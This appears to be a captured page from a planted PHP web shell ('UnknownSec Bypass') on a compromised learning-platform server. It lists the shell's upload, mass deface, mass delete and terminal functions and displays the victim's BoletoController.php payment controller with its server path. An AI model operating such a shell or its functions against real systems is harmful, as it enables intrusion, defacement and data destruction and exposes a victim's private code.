UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_47a82e406368
/
app
/
Http
/
Controllers
/
Cart
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
BoletoController.php
<?php namespace EstudioLMS\Http\Controllers\Cart; use EstudioLMS\Http\Controllers\Controller; use EstudioLMS\Services\Hires\BoletoService; use Illuminate\Http\Request; /** * Class BoletoController * @package EstudioLMS\Http\Controllers\Cart */ class BoletoController extends Controller { /** * @var BoletoService */ private $boletoService; /** * BoletoController constructor. * @param BoletoService $boletoService */ public function __construct( BoletoService $boletoService ) { $this->boletoService = $boletoService; } /** * @return \Illuminate\Contracts\View\Factory|\Illuminate\Http\RedirectResponse|\Illuminate\View\View */ public function checkoutBoleto() { return $this->boletoService->payWithBoleto(); } /** * @param $code * @param int $installment * @return string * @throws \Exception */ public function makeBoleto($code, $installment = 1) { return $this->boletoService->makeBillet($code, $installment); } /** * @param $code * @param int $installment * @return mixed */ public function fakeRetorno($code, $installment = 1) { return $this->boletoService->fakeRetorno($code, $installment); } /** * @param Request $request * @return \EstudioLMS\Models\Financial\PostbackPaghiper|mixed */ public function paghiperPostback(Request $request) { return $this->boletoService->paghiperPostback($request); } /** * @return \EstudioLMS\Models\Financial\PostbackPaghiper|\Illuminate\Database\Eloquent\Model|\Illuminate\Database\Query\Builder|mixed|null */ public function paghiperPostbackTst() { return $this->boletoService->paghiperPostbackTst(); } }
Copyright © 2026 - UnknownSec